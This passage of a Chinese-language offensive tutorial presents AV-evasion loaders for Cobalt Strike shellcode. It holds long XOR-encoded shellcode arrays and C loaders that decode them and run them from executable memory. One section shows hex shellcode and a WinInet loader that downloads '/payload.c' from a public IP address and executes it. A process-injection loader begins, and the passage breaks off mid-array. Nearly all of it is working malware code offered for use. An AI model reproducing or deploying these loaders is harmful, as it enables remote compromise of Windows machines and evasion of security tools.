ab\xb8\xf7\xc1\xdf\x81\x5c\x2b\xb9\x11\x85\xbe\xc8\xbb\x75\xbe\xac\x5c\xbc\x2d\x69\x3d\x25\x69\x41\x30\x6c\x0a\xb4\xd7\x69\x95\x49\xe2\x51\xd3\x30\xef\x77\x2d\xe6\x0a\x27\xb3\x11\x82\xf1\x16\xe1\xc5\x8a\xbc\x24\x3c\x77\x7c\x53\x4b\x2e\xab\x76\xcd\xbf\xee\xc2\x1d\x1c\xf4\x20\x8e\x88\x3d\xf4\xca\x68\xb9\xd2\xf5\x2b\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x2e\x31\x33\x00\x6f\xaa\x51\xc3";
​
    for (size_t i = 0; i < sizeof buf; i++) 
    {
        buf[i] ^= 66;
        buf[i] ^= 50;
        printf("\\x%x", buf[i]);
    }
​
    DWORD temp;
    VirtualProtect(buf, sizeof buf, PAGE_EXECUTE, &temp);
    ((void(*)())buf)();
}

在加载器加载

#include <Windows.h>
#include <stdio.h>
​
void main() {
    unsigned char buf[] = "\x8c\x38\xf3\x94\x80\x98\xb8\x70\x70\x70\x31\x21\x31\x20\x22\x21\x26\x38\x41\xa2\x15\x38\xfb\x22\x10\x38\xfb\x22\x68\x38\xfb\x22\x50\x38\xfb\x2\x20\x38\x7f\xc7\x3a\x3a\x3d\x41\xb9\x38\x41\xb0\xdc\x4c\x11\xc\x72\x5c\x50\x31\xb1\xb9\x7d\x31\x71\xb1\x92\x9d\x22\x31\x21\x38\xfb\x22\x50\xfb\x32\x4c\x38\x71\xa0\x16\xf1\x8\x68\x7b\x72\x5\x2\xfb\xf0\xf8\x70\x70\x70\x38\xf5\xb0\x4\x17\x38\x71\xa0\x20\xfb\x38\x68\x34\xfb\x30\x50\x39\x71\xa0\x93\x26\x38\x8f\xb9\x31\xfb\x44\xf8\x38\x71\xa6\x3d\x41\xb9\x38\x41\xb0\xdc\x31\xb1\xb9\x7d\x31\x71\xb1\x48\x90\x5\x81\x3c\x73\x3c\x54\x78\x35\x49\xa1\x5\xa8\x28\x34\xfb\x30\x54\x39\x71\xa0\x16\x31\xfb\x7c\x38\x34\xfb\x30\x6c\x39\x71\xa0\x31\xfb\x74\xf8\x38\x71\xa0\x31\x28\x31\x28\x2e\x29\x2a\x31\x28\x31\x29\x31\x2a\x38\xf3\x9c\x50\x31\x22\x8f\x90\x28\x31\x29\x2a\x38\xfb\x62\x99\x3f\x8f\x8f\x8f\x2d\x1a\x70\x39\xce\x7\x19\x1e\x19\x1e\x15\x4\x70\x31\x26\x39\xf9\x96\x3c\xf9\x81\x31\xca\x3c\x7\x56\x77\x8f\xa5\x38\x41\xb9\x38\x41\xa2\x3d\x41\xb0\x3d\x41\xb9\x31\x20\x31\x20\x31\xca\x4a\x26\x9\xd7\x8f\xa5\x9b\x3\x2a\x38\xf9\xb1\x31\xc8\x7a\x6a\x70\x70\x3d\x41\xb9\x31\x21\x31\x21\x1a\x73\x31\x21\x31\xca\x27\xf9\xef\xb6\x8f\xa5\x9b\x29\x2b\x38\xf9\xb1\x38\x41\xa2\x39\xf9\xa8\x3d\x41\xb9\x22\x18\x70\x72\x30\xf4\x22\x22\x31\xca\x9b\x25\x5e\x4b\x8f\xa5\x38\xf9\xb6\x38\xf3\xb3\x20\x1a\x7a\x2f\x38\xf9\x81\x38\xf9\xaa\x39\xb7\xb0\x8f\x8f\x8f\x8f\x3d\x41\xb9\x22\x22\x31\xca\x5d\x76\x68\xb\x8f\xa5\xf5\xb0\x7f\xf5\xed\x71\x70\x70\x38\x8f\xbf\x7f\xf4\xfc\x71\x70\x70\x9b\xa3\x99\x94\x71\x70\x70\x98\xd2\x8f\x8f\x8f\x5f\x13\x44\x24\x2\x70\xf5\xef\x18\x12\x16\x1a\xb\x59\xb9\x3\x29\x6d\x16\x8b\x85\x79\x62\xb1\x2f\x8b\x69\x81\x15\xc6\x5d\x97\x55\xce\xa8\x5\xaf\x25\xd5\x74\xd3\xfb\xb0\xd2\xa0\x18\x7a\xee\x72\x6a\xbd\x3c\xa5\xef\x28\xc2\xaf\xf2\x61\x65\x2\x83\xd2\x5b\xa5\xcd\xab\x73\x58\x5f\x5\x36\x35\xdc\x12\x9c\x82\x55\x7e\x70\x25\x3\x15\x2\x5d\x31\x17\x15\x1e\x4\x4a\x50\x3d\x1f\xa\x19\x1c\x1c\x11\x5f\x45\x5e\x40\x50\x58\x13\x1f\x1d\x0\x11\x4\x19\x12\x1c\x15\x4b\x50\x3d\x23\x39\x35\x50\x41\x40\x5e\x40\x4b\x50\x27\x19\x1e\x14\x1f\x7\x3\x50\x3e\x24\x50\x46\x5e\x41\x4b\x50\x27\x3f\x27\x46\x44\x4b\x50\x24\x2\x19\x14\x15\x1e\x4\x5f\x46\x5e\x40\x59\x7d\x7a\x70\xfc\x90\xae\xd9\xbe\xa0\x15\x15\xaa\x1f\xb7\x82\xe2\xce\x10\x0\xd9\x15\x33\x95\x72\x69\xf5\x1b\x3e\x10\x10\x7b\xe9\x2c\x11\x70\x40\x41\x7d\x6a\xbd\x85\x7f\xaf\xa6\x52\xf5\xb7\x81\xfc\x5f\xa6\x3d\xdc\xb6\x27\x1b\xa4\x50\xd6\x8d\x70\xce\x85\x56\x9\x99\xe4\xe\xcf\x61\xfc\xfe\xac\xaa\x56\x7b\x30\xc3\x37\x5e\x62\xd6\xe2\x3b\xe3\x5f\x97\x1\x0\xdf\x4d\x32\xf4\x3\xd1\x8e\xaa\x31\xa6\x5e\x1c\x72\xa2\x76\xfe\xee\x86\x1\xd0\xd9\x41\xc4\x76\xcb\x35\x62\x98\x7a\x4f\x58\xec\xcb\x90\x51\x40\x88\x3a\x1\xc4\xc1\xcf\x16\x50\x6e\xd0\x18\x47\x7e\x78\x79\x7f\xdb\xc8\x87\xb1\xaf\xf1\x2c\x5b\xc9\x61\xf5\xce\xb8\xcb\x5\xce\xdc\x2c\xcc\x5d\x19\x4d\x55\x19\x31\x40\x1c\x7a\xc4\xa7\x19\xe5\x39\x92\x21\xa3\x40\x9f\x7\x5d\x96\x7a\x57\xc3\x61\xf2\x81\x66\x91\xb5\xfa\xcc\x54\x4c\x7\xc\x23\x3b\x5e\xdb\x6\xbd\xcf\x9e\xb2\x6d\x6c\x84\x50\xfe\xf8\x4d\x84\xba\x18\xc9\xa2\x85\x5b\x70\x31\xce\x80\xc5\xd2\x26\x8f\xa5\x38\x41\xb9\xca\x70\x70\x30\x70\x31\xc8\x70\x60\x70\x70\x31\xc9\x30\x70\x70\x70\x31\xca\x28\xd4\x23\x95\x8f\xa5\x38\xe3\x23\x23\x38\xf9\x97\x38\xf9\x81\x38\xf9\xaa\x31\xc8\x70\x50\x70\x70\x39\xf9\x89\x31\xca\x62\xe6\xf9\x92\x8f\xa5\x38\xf3\xb4\x50\xf5\xb0\x4\xc6\x16\xfb\x77\x38\x71\xb3\xf5\xb0\x5\xa7\x28\x28\x28\x38\x75\x70\x70\x70\x70\x20\xb3\x98\xef\x8d\x8f\x8f\x41\x49\x42\x5e\x41\x46\x48\x5e\x41\x45\x5e\x41\x43\x70\x1f\xda\x21\xb3\x70";
    unsigned char shellcode[892];
    int len = sizeof(shellcode) - 1;
    for (size_t i = 0; i < len; i++)
    {
        buf[i] ^= 66;
        buf[i] ^= 50;
        shellcode[i] = buf[i];
    }
    DWORD temp;
    VirtualProtect(shellcode, sizeof shellcode, PAGE_EXECUTE, &temp);
    ((void(*)())shellcode)();
}

或者只是用50异或,效果还可以

#include <Windows.h>
#include <stdio.h>
​
​
void main() {
    unsigned char buf[] = "\xce\x7a\xb1\xd6\xc2\xda\xfa\x32\x32\x32\x73\x63\x73\x62\x60\x63\x64\x7a\x3\xe0\x57\x7a\xb9\x60\x52\x7a\xb9\x60\x2a\x7a\xb9\x60\x12\x7a\xb9\x40\x62\x7a\x3d\x85\x78\x78\x7f\x3\xfb\x7a\x3\xf2\x9e\xe\x53\x4e\x30\x1e\x12\x73\xf3\xfb\x3f\x73\x33\xf3\xd0\xdf\x60\x73\x63\x7a\xb9\x60\x12\xb9\x70\xe\x7a\x33\xe2\x54\xb3\x4a\x2a\x39\x30\x47\x40\xb9\xb2\xba\x32\x32\x32\x7a\xb7\xf2\x46\x55\x7a\x33\xe2\x62\xb9\x7a\x2a\x76\xb9\x72\x12\x7b\x33\xe2\xd1\x64\x7a\xcd\xfb\x73\xb9\x6\xba\x7a\x33\xe4\x7f\x3\xfb\x7a\x3\xf2\x9e\x73\xf3\xfb\x3f\x73\x33\xf3\xa\xd2\x47\xc3\x7e\x31\x7e\x16\x3a\x77\xb\xe3\x47\xea\x6a\x76\xb9\x72\x16\x7b\x33\xe2\x54\x73\xb9\x3e\x7a\x76\xb9\x72\x2e\x7b\x33\xe2\x73\xb9\x36\xba\x7a\x33\xe2\x73\x6a\x73\x6a\x6c\x6b\x68\x73\x6a\x73\x6b\x73\x68\x7a\xb1\xde\x12\x73\x60\xcd\xd2\x6a\x73\x6b\x68\x7a\xb9\x20\xdb\x7d\xcd\xcd\xcd\x6f\x58\x32\x7b\x8c\x45\x5b\x5c\x5b\x5c\x57\x46\x32\x73\x64\x7b\xbb\xd4\x7e\xbb\xc3\x73\x88\x7e\x45\x14\x35\xcd\xe7\x7a\x3\xfb\x7a\x3\xe0\x7f\x3\xf2\x7f\x3\xfb\x73\x62\x73\x62\x73\x88\x8\x64\x4b\x95\xcd\xe7\xd9\x41\x68\x7a\xbb\xf3\x73\x8a\x38\x28\x32\x32\x7f\x3\xfb\x73\x63\x73\x63\x58\x31\x73\x63\x73\x88\x65\xbb\xad\xf4\xcd\xe7\xd9\x6b\x69\x7a\xbb\xf3\x7a\x3\xe0\x7b\xbb\xea\x7f\x3\xfb\x60\x5a\x32\x30\x72\xb6\x60\x60\x73\x88\xd9\x67\x1c\x9\xcd\xe7\x7a\xbb\xf4\x7a\xb1\xf1\x62\x58\x38\x6d\x7a\xbb\xc3\x7a\xbb\xe8\x7b\xf5\xf2\xcd\xcd\xcd\xcd\x7f\x3\xfb\x60\x60\x73\x88\x1f\x34\x2a\x49\xcd\xe7\xb7\xf2\x3d\xb7\xaf\x33\x32\x32\x7a\xcd\xfd\x3d\xb6\xbe\x33\x32\x32\xd9\xe1\xdb\xd6\x33\x32\x32\xda\x90\xcd\xcd\xcd\x1d\x5d\x75\x41\x6\x32\x3\x49\x0\x7b\x7d\x54\xaf\x92\xa1\xa2\xb1\x75\x96\x96\xd7\x7d\xfe\xbb\xa7\xeb\x12\xaa\x6b\x5d\xf6\xef\x54\x25\x6a\x7a\x52\x7c\x91\x63\x5a\x49\x7f\x32\x76\x52\x45\x61\xdf\xea\xd3\xf8\xb8\x60\x6f\xd3\x5a\x4c\x7c\x4b\xe5\xb2\x50\x3b\xff\x65\xb4\xff\x6d\x6e\x5b\x8f\x34\xc3\x7b\x6e\xfa\xf\x8c\x32\x67\x41\x57\x40\x1f\x73\x55\x57\x5c\x46\x8\x12\x7f\x5d\x48\x5b\x5e\x5e\x53\x1d\x7\x1c\x2\x12\x1a\x51\x5d\x5f\x42\x53\x46\x5b\x50\x5e\x57\x9\x12\x7f\x61\x7b\x77\x12\x3\x2\x1c\x2\x9\x12\x65\x5b\x5c\x56\x5d\x45\x41\x12\x7c\x66\x12\x4\x1c\x0\x9\x12\x66\x40\x5b\x56\x57\x5c\x46\x1d\x4\x1c\x2\x1b\x3f\x38\x32\xaa\x3e\x76\x21\x64\x26\x69\x7c\x7\x98\x54\x67\xf3\xae\x39\xff\x43\xa0\xf0\x21\x44\xec\x46\xa\xb0\x4f\xc6\x36\xef\x63\x1a\xa9\xc8\xbb\x80\x2\x51\x59\x6\x77\xda\x7e\x51\xed\xdb\xb2\x68\x5f\xdc\xef\x68\xaa\x2a\x3f\xad\x96\x86\xb5\xce\x93\xff\x60\x2a\x19\x59\x49\x7f\xe8\x59\xb\x7\x49\x36\x7e\x42\x3\x46\x90\xcf\xc6\x9\x3f\xb4\xd2\x9d\x1\x73\x61\x74\x4e\xbb\x27\xec\x15\xd4\xf8\x32\x8f\xaf\x9d\xfd\xfa\x18\xde\xf9\x9b\xbc\x3d\xeb\x9\xd3\x31\xae\x4a\x71\x74\xba\x29\x94\xf2\x10\xca\x9f\x46\x97\x4b\xe5\xf1\x60\xd3\xf\xef\x65\x83\xa1\x32\x4b\x88\x4b\xc1\x46\x6f\x6d\x3c\x9a\xc\x8f\x13\xef\x10\x91\x18\xb7\xb6\x8c\xb5\x5e\x7e\xf7\x5b\xda\x8d\x2f\x68\x12\x70\xea\x62\xd2\xfb\x5a\xa2\x7a\x3c\xa7\xe1\xc4\x80\xba\xcb\x2d\x58\xf6\xe5\x11\x20\xd9\xa5\xc0\xe2\x50\x56\xa3\x75\x43\x96\x44\xb4\xf0\x3d\xd4\xce\x7c\x40\x21\x40\x6e\x30\xb7\x95\x27\x4a\x5\x88\x55\x1e\x8c\x5f\xd8\xb1\xa2\x4f\x87\x75\x32\x73\x8c\xc2\x87\x90\x64\xcd\xe7\x7a\x3\xfb\x88\x32\x32\x72\x32\x73\x8a\x32\x22\x32\x32\x73\x8b\x72\x32\x32\x32\x73\x88\x6a\x96\x61\xd7\xcd\xe7\x7a\xa1\x61\x61\x7a\xbb\xd5\x7a\xbb\xc3\x7a\xbb\xe8\x73\x8a\x32\x12\x32\x32\x7b\xbb\xcb\x73\x88\x20\xa4\xbb\xd0\xcd\xe7\x7a\xb1\xf6\x12\xb7\xf2\x46\x84\x54\xb9\x35\x7a\x33\xf1\xb7\xf2\x47\xe5\x6a\x6a\x6a\x7a\x37\x32\x32\x32\x32\x62\xf1\xda\xad\xcf\xcd\xcd\x3\xb\x0\x1c\x3\x4\xa\x1c\x3\x7\x1c\x3\x1\x32\x5d\x98\x63\xf1";
​
    for (size_t i = 0; i < sizeof buf - 1; i++)
    {
        buf[i] ^= 50;
        printf("\\x%x", buf[i]);
    }
​
    void* exe = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exe, buf, sizeof(buf));
    ((void(*)())exe)();
​
​
    //DWORD temp;
    //VirtualProtect(buf, sizeof buf, PAGE_EXECUTE, &temp);
    //((void(*)())buf)();
}

3.远程加载shellcode bypass

使用cobaltstrike进行shellcode的生成,放在远程服务器上

fc4883e4f0e8c8000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b0275728b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94fffffff5d6a0049be77696e696e65740041564989e64c89f141ba4c772607ffd54831c94831d24d31c04d31c94150415041ba3a5679a7ffd5eb735a4889c141b80a1a00004d31c9415141516a03415141ba57899fc6ffd5eb595b4889c14831d24989d84d31c9526800024084525241baeb552e3bffd54889c64883c3506a0a5f4889f14889da49c7c0ffffffff4d31c9525241ba2d06187bffd585c00f859d01000048ffcf0f848c010000ebd3e9e4010000e8a2ffffff2f6252347500ad3d2d2add6a4fc11e95de74892f1863bbfa37835201ef5dc8d39f12e4d055c3b7107ae88482e268045b46d8d7caf2c864e0fbdce5a53402bbce644e90c2a1d8d47c123b5a4f245ab400557365722d4167656e743a204d6f7a696c6c612f352e302028636f6d70617469626c653b204d5349452031302e303b2057696e646f7773204e5420362e323b2054726964656e742f362e30290d0a007e599a8d09cf08cce83ced48d5c4e3f13d046aee1ad13de8d1c6c160e261eb0a6e333569076dd2c88f7bb3cbe3421ded1e6e2fd6073bc57def331242e1a541882d07b6e1667f054ed28b659968dd1d3b53dd48c13c72adbf174c994c43ba1d25ab942f4e6380ca5e8bb7c8181fc83e53b91a2593e1af5468c1237acbabe67df9d239a65778e0cda7ce28a56508b8b5a57cd7e10bb0e05dd698096fd2f6b058ba7a4ebf3c70bd74a9f6f6364bd27838085cc34ccf2087c685926d33c6fc37976308b424e5b13e48ccf0ae7c4511c8dcf0c1d467595c51bd8e774fe7324001f2c10041bef0b5a256ffd54831c9ba0000400041b80010000041b94000000041ba58a453e5ffd5489353534889e74889f14889da41b8002000004989f941ba129689e2ffd54883c42085c074b6668b074801c385c075d758585848050000000050c3e89ffdffff3139322e3136382e31352e3133006faa51c3

加载器进行远程执行

#include <stdio.h>
#include <Windows.h>
#include <WinInet.h>
#pragma comment(lib, "WinInet.lib")

char* GetUrlPage(const char* URL, const char* SubPath)
{
	HINTERNET hInternet, hConnect, hRequest = NULL;
	DWORD dwOpenRequestFlags, dwRet = 0;
	unsigned char* pResponseHeaderIInfo = NULL;
	DWORD dwResponseHeaderIInfoSize = 2048;
	BYTE* pBuf = NULL;
	DWORD dwBufSize = 64 * 2048;

	hInternet = InternetOpenA("WinInetGet/0.1", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
	hConnect = InternetConnectA(hInternet, URL, INTERNET_DEFAULT_HTTP_PORT, 0, 0, INTERNET_SERVICE_HTTP, 0, 0);
	if (NULL == hConnect)
		return NULL;

	dwOpenRequestFlags = INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_KEEP_CONNECTION |
		INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_COOKIES | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD;

	hRequest = HttpOpenRequestA(hConnect, "GET", SubPath, NULL, NULL, NULL, dwOpenRequestFlags, 0);
	HttpSendRequest(hRequest, NULL, 0, NULL, 0);

	pResponseHeaderIInfo = new unsigned char[dwResponseHeaderIInfoSize];
	RtlZeroMemory(pResponseHeaderIInfo, dwResponseHeaderIInfoSize);
	HttpQueryInfo(hRequest, HTTP_QUERY_RAW_HEADERS_CRLF, pResponseHeaderIInfo, &dwResponseHeaderIInfoSize, NULL);
	pBuf = new BYTE[dwBufSize];

	RtlZeroMemory(pBuf, dwBufSize);
	InternetReadFile(hRequest, pBuf, dwBufSize, &dwRet);
	return (char*)pBuf;
}

void main()
{
	char* shellcode = GetUrlPage("124.70.216.166", "/payload.c");
	printf("%s \n", shellcode);
	int shellcode_length = strlen(shellcode);

	unsigned char* value = (unsigned char*)calloc(shellcode_length / 2, sizeof(unsigned char));
	for (size_t count = 0; count < shellcode_length / 2; count++) {
		sscanf_s(shellcode, "%2hhx", &value[count]);
		shellcode += 2;
	}

	void* exec = VirtualAlloc(0, shellcode_length / 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(exec, value, shellcode_length / 2);
	((void(*)())exec)();
}

4.进程注入

先异或一个50

#include <Windows.h>
#include <stdio.h>


void main() {
	unsigned char buf[] = "\xce\x7a\xb1\xd6\xc2\xda\xfa\x32\x32\x32\x73\x63\x73\x62\x60\x63\x64\x7a\x3\xe0\x57\x7a\xb9\x60\x52\x7a\xb9\x60\x2a\x7a\xb9\x60\x12\x7a\xb9\x40\x62\x7a\x3d\x85\x78\x78\x7f\x3\xfb\x7a\x3\xf2\x9e\xe\x53\x4e\x30\x1e\x12\x73\xf3\xfb\x3f\x73\x33\xf3\xd0\xdf\x60\x73\x63\x7a\xb9\x60\x12\xb9\x70\xe\x7a\x33\xe2\x54\xb3\x4a\x2a\x39\x30\x47\x40\xb9\xb2\xba\x32\x32\x32\x7a\xb7\xf2\x46\x55\x7a\x33\xe2\x62\xb9\x7a\x2a\x76\xb9\x72\x12\x7b\x33\xe2\xd1\x64\x7a\xcd\xfb\x73\xb9\x6\xba\x7a\x33\xe4\x7f\x3\xfb\x7a\x3\xf2\x9e\x73\xf3\xfb\x3f\x73\x33\xf3\xa\xd2\x47\xc3\x7e\x31\x7e\x16\x3a\x77\xb\xe3\x47\xea\x6a\x76\xb9\x72\x16\x7b\x33\xe2\x54\x73\xb9\x3e\x7a\x76\xb9\x72\x2e\x7b\x33\xe2\x73\xb9\x36\xba\x7a\x33\xe2\x73\x6a\x73\x6a\x6c\x6b\x68\x73\x6a\x73\x6b\x73\x68\x7a\xb1\xde\x12\x73\x60\xcd\xd2\x6a\x73\x6b\x68\x7a\xb9\x20\xdb\x7d\xcd\xcd\xcd\x6f\x58\x32\x7b\x8c\x45\x5b\x5c\x5b\x5c\x57\x46\x32\x73\x64\x7b\xbb\xd4\x7e\xbb\xc3\x73\x88\x7e\x45\x14\x35\xcd\xe7\x7a\x3\xfb\x7a\x3\xe0\x7f\x3\xf2\x7f\x3\xfb\x73\x62\x73\x62\x73\x88\x8\x64\x4b\x95\xcd\xe7\xd9\x41\x68\x7a\xbb\xf3\x73\x8a\x38\x28\x32\x32\x7f\x3\xfb\x73\x63\x73\x63\x58\x31\x73\x63\x73\x88\x65\xbb\xad\xf4\xcd\xe7\xd9\x6b\x69\x7a\xbb\xf3\x7a\x3\xe0\x7b\xbb\xea\x7f\x3\xfb\x60\x5a\x32\x30\x72\xb6\x60\x60\x73\x88\xd9\x67\x1c\x9\xcd\xe7\x7a\xbb\xf4\x7a\xb1\xf1\x62\x58\x38\x6d\x7a\xbb\xc3\x7a\xbb\xe8\x7b\xf5\xf2\xcd\xcd\xcd\xcd\x7f\x3\xfb\x60\x60\x73\x88\x1f\x34\x2a\x49\xcd\xe7\xb7\xf2\x3d\xb7\xaf\x33\x32\x32\x7a\xcd\xfd\x3d\xb6\xbe\x33\x32\x32\xd9\xe1\xdb\xd6\x33\x32\x32\xda\x90\xcd\xcd\xcd\x1d\x5d\x75\x41\x6\x32\x3\x49\x0\x7b\x7d\x54\xaf\x92\xa1\xa2\xb1\x75\x96\x96\xd7\x7d\xfe\xbb\xa7\xeb\x12\xaa\x6b\x5d\xf6\xef\x54\x25\x6a\x7a\x52\x7c\x91\x63\x5a\x49\x7f\x32\x76\x52\x45\x61\xdf\xea\xd3\xf8\xb8\x60\x6f\xd3\x5a\x4c\x7c\x4b\xe5\xb2\x50\x3b\xff\x65\xb4\xff\x6d\x6e\x5b\x8f\x34\xc3\x7b\x6e\xfa\xf\x8c\x32\x67\x41\x57\x40\x1f\x73\x55\x57\x5c\x46\x8\x12\x7f\x5d\x48\x5b\x5e\x5e\x53\x1d\x7\x1c\x2\x12\x1a\x51\x5d\x5f\x42\x53\x46\x5b\x50\x5e\x57\x9\x12\x7f\x61\x7b\x77\x12\x3\x2\x1c\x2\x9\x12\x65\x5b\x5c\x56\x5d\x45\x41\x12\x7c\x66\x12\x4\x1c\x0\x9\x12\x66\x40\x5b\x56\x57\x5c\x46\x1d\x4\x1c\x2\x1b\x3f\x38\x32\xaa\x3e\x76\x21\x64\x26\x69\x7c\x7\x98\x54\x67\xf3\xae\x39\xff\x43\xa0\xf0\x21\x44\xec\x46\xa\xb0\x4f\xc6\x36\xef\x63\x1a\xa9\xc8\xbb\x80\x2\x51\x59\x6\x77\xda\x7e\x51\xed\xdb\xb2\x68\x5f\xdc\xef\x68\xaa\x2a\x3f\xad\x96\x86\xb5\xce\x93\xff\x60\x2a\x19\x59\x49\x7f\xe8\x59\xb\x7\x49\x36\x7e\x42\x3\x46\x90\xcf\xc6\x9\x3f\xb4\xd2\x9d\x1\x73\x61\x74\x4e\xbb\x27\xec\x15\xd4\xf8\x32\x8f\xaf\x9d\xfd\xfa\x18\xde\xf9\x9b\xbc\x3d\xeb\x9\xd3\x31\xae\x4a\x71\x74\xba\x29\x94\xf2\x10\xca\x9f\x46\x97\x4b\xe5\xf1\x60\xd3\xf\xef\x65\x83\xa1\x32\x4b\x88\x4b\xc1\x46\x6f\x6d\x3c\x9a\xc\x8f\x13\xef\x10\x91\x18\xb7\xb6\x8c\xb5\x5e\x7e\xf7\x5b\xda\x8d\x2f\x68\x12\x70\xea\x62\xd2\xfb\x5a\xa2\x7a\x3c\xa7\xe1\xc4\x80\xba\xcb\x2d\x58\xf6\xe5\x11\x20\xd9\xa5\xc0\xe2\x50\x56\xa3\x75\x43\x96\x44\xb4\xf0\x3d\xd4\xce\x7c\x40\x21\x40\x6e\x30\xb7\x95\x27\x4a\x5\x88\x55\x1e\x8c\x5f\xd8\xb1\xa2\x4f\x87\x75\x32\x73\x8c\xc2\x87\x90\x64\xcd\xe7\x7a\x3\xfb\x88\x32\x32\x72\x32\x73\x8a\x32\x22\x32\x32\x73\x8b\x72\x32\x32\x32\x73\x88\x6a\x96\x61\xd7\xcd\xe7\x7a\xa1\x61\x61\x7a\xbb\xd5\x7a\xbb\xc3\x7a\xbb\xe8\x73\x8a\x32\x12\x32\x32\x7b\xbb\xcb\x73\x88\x20\xa4\xbb\xd0\xcd\xe7\x7a\xb1\xf6\x12\xb7\xf2\x46\x84\x54\xb9\x35\x7a\x33\xf1\xb7\xf2\x47\xe5\x6a\x6a\x6a\x7a\x37\x32\x32\x32\x32\x62\xf1\xda\xad\xcf\xcd\xcd\x3\xb\x0\x1c\x3\x4\xa\x1c\x3\x7\x1c\x3\x1\x32\x5d\x98\x63\xf1";

	for (size_t i = 0; i < sizeof buf; i++) 
	{
		buf[i] ^= 50;
		printf("\\x%x", buf[i]);
	}

	DWORD temp;
	VirtualProtect(buf, sizeof buf, PAGE_EXECUTE, &temp);
	((void(*)())buf)();
}

#include <stdio.h>
#include <windows.h>
#include <TlHelp32.h>
unsigned char buf[] = "\xce\x7a\xb1\xd6\xc2\xda\xfa\x32\x32\x32\x73\x63\x73\x62\x60\x63\x64\x7a\x3\xe0\x57\x7a\xb9\x60\x52\x7a\xb9\x60\x2a\x7a\xb9\x60\x12\x7a\xb9\x40\x62\x7a\x3d\x85\x78\x78\x7f\x3\xfb\x7a\x3\xf2\x9e\xe\x53\x4e\x30\x1e\x12\x73\xf3\xfb\x3f\x73\x33\xf3\xd0\xdf\x60\x73\x63\x7a\xb9\x60\x12\xb9\x70\xe\x7a\x33\xe2\x54\xb3\x4a\x2a\x39\x30\x47\x40\xb9\xb2\xba\x32\x32\x32\x7a\xb7\xf2\x46\x55\x7a\x33\xe2\x62\xb9\x7a\x2a\x76\xb9\x72\x12\x7b\x33\xe2\xd1\x64\x7a\xcd\xfb\x73\xb9\x6\xba\x7a\x33\xe4\x7f\x3\xfb\x7a\x3\xf2\x9e\x73\xf3\xfb\x3f\x73\x33\xf3\xa\xd2\x47\xc3\x7e\x31\x7e\x16\x3a\x77\xb\xe3\x47\xea\x6a\x76\xb9\x72\x16\x7b\x33\xe2\x54\x73\xb9\x3e\x7a\x76\xb9\x72\x2e\x7b\x33\xe2\x73\xb9\x36\xba\x7a\x33\xe2\x73\x6a\x73\x6a\x6c\x6b\x68\x73\x6a\x73\x6b\x73\x68\x7a\xb1\xde\x12\x73\x60\xcd\xd2\x6a\x73\x6b\x68\x7a\xb9\x20\xdb\x7d\xcd\xcd\xcd\x6f\x58\x32\x7b\x8c\x45\x5b\x5c\x5b\x5c\x57\x46\x32\x73\x64\x7b\xbb\xd4\x7e\xbb\xc3\x73\x88\x7e\x45\x14\x35\xcd\xe7\x7a\x3\xfb\x7a\x3\xe0\x7f\x3\xf2\x7f\x3\xfb\x73\x62\x73\x62\x73\x88\x8\x64\x4b\x95\xcd\xe7\xd9\x41\x68\x7a\xbb\xf3\x73\x8a\x38\x28\x32\x32\x7f\x3\xfb\x73\x63\x73\x63\x58\x31\x73\x63\x73\x88\x65\xbb\xad\xf4\xcd\xe7\xd9\x6b\x69\x7a\xbb\xf3\x7a\x3\xe0\x7b\xbb\xea\x7f\x3\xfb\x60\x5a\x32\x30\x72\xb6\x60\x60\x73\x88\xd9\x67\x1c\x9\xcd\xe7\x7a\xbb\xf4\x7a\xb1\xf1\x62\x58\x38\x6d\x7a\xbb\xc3\x7a\xbb\xe8\x7b\xf5\xf2\xcd\xcd\xcd\xcd\x7f\x3\xfb\x60\x60\x73\x88\x1f\x34\x2a\x49\xcd\xe7\xb7\xf2\x3d\xb7\xaf\x33\x32\x32\x7a\xcd\xfd\x3d\xb6\xbe\x33\x32\x32\xd9\xe1\xdb\xd6\x33\x32\x32\xda\x90\xcd\xcd\xcd\x1d\x5d\x75\x41\x6\x32\x3\x49\x0\x7b\x7d\x54\xaf\x92\xa1\xa2\xb1\x75\x96\x96\xd7\x7d\xfe\xbb\xa7\xeb\x12\xaa\x6b\x5d\xf6\xef\x54\x25\x6a\x7a\x52\x7c\x91\x63\x5a\x49\x7f\x32\x76\x52\x45\x61\xdf\xea\xd3\xf8\xb8\x60\x6f\xd3\x5a\x4c\x7c\x4b\xe5\xb2\x50\x3b\xff\x65\xb4\xff\x6d\x6e\x5b\x8f\x34\xc3\x7b\x6e\xfa\xf\x8c\x32\x67\x41\x57\x40\x1f\x73\x55\x57\x5c\x46\x8\x12\x7f\x5d\x48\x5b\x5e\x5e\x53\x1d\x7\x1c\x2\x12\x1a\x51\x5d\x5f\x42\x53\x46\x5b\x50\x5e\x57\x9\x12\x7f\x61\x7b\x77\x12\x3\x2\x1c\x2\x9\x12\x65\x5b\x5c\x56\x5d\x45\x41\x12\x7c\x66\x12\x4\x1c\x0\x9\x12\x66\x40\x5b\x56\x57\x5c\x46\x1d\x4\x1c\x2\x1b\x3f\x38\x32\xaa\x3e\x76\x21\